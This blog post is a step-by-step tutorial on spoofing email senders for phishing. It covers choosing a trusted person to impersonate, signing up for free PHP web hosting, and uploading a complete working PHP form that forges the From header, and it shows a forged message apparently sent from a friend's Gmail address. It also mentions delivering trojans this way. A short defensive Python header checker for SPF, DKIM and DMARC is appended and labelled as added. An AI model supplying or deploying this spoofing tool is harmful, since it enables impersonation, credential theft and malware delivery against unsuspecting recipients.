Gourav Dhar

How hackers impersonate email IDs: Email Spoofing and Phishing Attacks


Email Spoofing

Email spoofing is a type of cyber-attack in which the attacker sends fake emails that appear to have been sent by a legitimate or known person or entity. It is a common tactic for carrying out phishing attacks or spamming. The receiver sees an email address they trust and a name they are familiar with (mostly a friend, a colleague or an organisation they work with) and ends up believing the email and taking the action it asks for.

In my previous blogs, I have mentioned how to create trojans and backdoors. When executed, the user sees normal files, but in the background, the evil code gets executed.


Delivering these files can be an application of email spoofing.


How to Spoof Emails

The first step is gathering information and deciding which email address you want to spoof. The email should impersonate a person or an organisation that the target trusts. It’s all social engineering!


If you are impersonating a friend, you can tell the target person to open an image. If you impersonate a support member from an organisation or admin of a website, you can tell the target to log in using a fake login page or tell the target to install an update.


Take a scenario

Suppose I want to impersonate the target person’s friend whose name is Aakash, and I know that his email id is aakash@gmail.com. I will try to send a fake email to my target impersonating his email id.

It is really easy. Go to Google and search for spoof emails online.


You will find a lot of websites providing this service. The problem with sending emails from these websites is that many of them end up in the target's spam folder rather than the inbox. These websites are public and a lot of people use them for spamming, so mail servers such as Google, Yahoo, etc. mark emails received from them as spam.

To bypass this you can either use your own web-hosting plan or you can sign up for a free web-hosting plan and use that for sending fake emails.


Using a web hosting plan

The requirement for this method is that the web-hosting provider supports PHP files, so static web hosting won’t work. You can also use your own domain with the web-hosting provider, but for this blog I will use a free web-hosting provider. I will be using https://www.000webhost.com/.

This is a paid service, but I will be using their free plan for this blog. Go to the above link, scroll down and click on Free Sign Up under Free Web Hosting.


After signing up, click on the Create new site button on the top right.

A pop-up will appear where you need to add your website name and password. Remember both of these.

Next, open https://files.000webhost.com/ in the same browser where you are logged into the webhost account. You may or may not need to enter the above credentials. If you are prompted, enter them and proceed. A page similar to the one shown below should be visible.


Open the folder named public_html by double-clicking it. Save the following script in a file named send.php and upload it to the public_html folder.

<?php
if (isset($_POST["send"])) {
 $to = $_POST["to"];
 $subject = $_POST["subject"];
 $message = $_POST["message"];
 $from = $_POST["from"];
 $name = $_POST["name"];
 if (!(filter_var($to, FILTER_VALIDATE_EMAIL) && filter_var($from, FILTER_VALIDATE_EMAIL))) {
  echo "Email address inputs invalid";
  die();
 }
 $header = "From: " .  $name . " <" . $from . ">\r\nMIME-Version: 1.0\r\nContent-type: text/html\r\n";
 $retval = mail ($to, $subject, $message, $header);
 if ($retval) {
  echo "Email sent.";
 } else {
  echo "Email did not send. Error: " . $retval;
 }
} else {
 echo 
 '<html>
  <head>
   <style> 
    input[type=submit] {
      background-color: #4CAF50;
      border: none;
      color: white;
      padding: 14px 32px;
      text-decoration: none;
      margin: 4px 2px;
      cursor: pointer;
      font-size: 16px;
    }
   </style>
  </head>
  <body>
<h2>Spoof Email</h2>
<form action="/send.php" method="post" id="emailform">
     <label for="to">To:</label><br>
     <input type="text" id="to" name="to"><br><br>
     <label for="from">From:</label><br>
     <input type="text" id="from" name="from"><br><br>
     <label for="name">Name (optional):</label><br>
     <input type="text" id="name" name="name"><br><br>
     <label for="subject">Subject:</label><br>
     <input type="text" id="subject" name="subject"><br><br>
     <label for="message">Message [HTML is supported]:</label><br>
     <textarea rows="6" cols="50" name="message" form="emailform"></textarea><br><br>
     <input type="hidden" id="send" name="send" value="true">
     <input type="submit" value="Submit">
   </form>
<p>An e-mail will be sent to the desired target with a spoofed From header when you click Submit.</p>
</body>
 </html>' ;
}
?>

Great, we are done! Now it’s time for some action. Go to the homepage of 000webhost. Your site will appear in a card. Click on the URL.


I need to append send.php to the end of the URL and run it. So for me the URL will be https://test-xyz-infinee.000webhostapp.com/send.php


A form similar to the one shown below will appear.


Since I was impersonating Aakash, whose email id is aakash@gmail.com, I will fill in the details accordingly.

Finally, click on Submit and poof! Email sent.

On checking my email (target_email), I actually received an email from the email address aakash@gmail.com. I also got a notification on my iPhone and it looks pretty convincing and authentic!


Attaching screenshots of how the emails look on the browser when opened.

The name appears correctly. Even the email id appears correctly.

The only way to tell that it is not genuine and is a phishing email is the text written after "via", and even that is visible only if the email is viewed in a web browser.
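The "via" label reflects a mismatch between the visible From domain and the domain that actually sent the message, and a receiver can check the same thing from the headers. The following is an added example, not part of the original post: it compares the From domain with the envelope sender and reads the SPF/DKIM/DMARC verdicts. The sample messages, the host names `shared-host.example` and `mx.receiver.example`, and the function names are constructed for illustration, and the Authentication-Results header is assumed to have been added by your own receiving server.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed samples: headers as a receiving server might record them.
# Host names and verdicts are made up for illustration.
SPOOFED = """\
Return-Path: <u12345@shared-host.example>
Authentication-Results: mx.receiver.example;
 spf=pass smtp.mailfrom=u12345@shared-host.example;
 dkim=none; dmarc=fail header.from=gmail.com
From: Aakash <aakash@gmail.com>
Subject: Check this photo

hello
"""

GENUINE = """\
Return-Path: <aakash@gmail.com>
Authentication-Results: mx.receiver.example;
 spf=pass smtp.mailfrom=aakash@gmail.com;
 dkim=pass header.d=gmail.com; dmarc=pass header.from=gmail.com
From: Aakash <aakash@gmail.com>
Subject: Lunch?

hello
"""

def domain(addr_header):
    """Lower-cased domain of the address in a From/Return-Path header."""
    return parseaddr(addr_header or "")[1].rpartition("@")[2].lower()

def spoof_findings(raw):
    """Return reasons the visible From address should not be trusted."""
    msg = message_from_string(raw)
    from_dom, env_dom = domain(msg["From"]), domain(msg["Return-Path"])
    # Unfold the header, then collect method=result pairs (spf, dkim, dmarc).
    auth = " ".join((msg["Authentication-Results"] or "").split())
    results = dict(re.findall(r"\b(spf|dkim|dmarc)=(\w+)", auth))
    findings = []
    # Exact match here; DMARC relaxed mode compares organizational domains.
    if env_dom != from_dom:
        findings.append(f"envelope sender {env_dom} != From domain {from_dom}")
    if results.get("dkim") != "pass":
        findings.append("no passing DKIM signature")
    if results.get("dmarc") != "pass":
        findings.append(f"DMARC result: {results.get('dmarc', 'missing')}")
    return findings
```

An SPF pass on its own proves only that the hosting provider may send for its own domain, which is why the From-domain comparison and the DMARC verdict carry the decision.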


This blog was originally published on Gourav's personal blog: https://gourav-dhar.com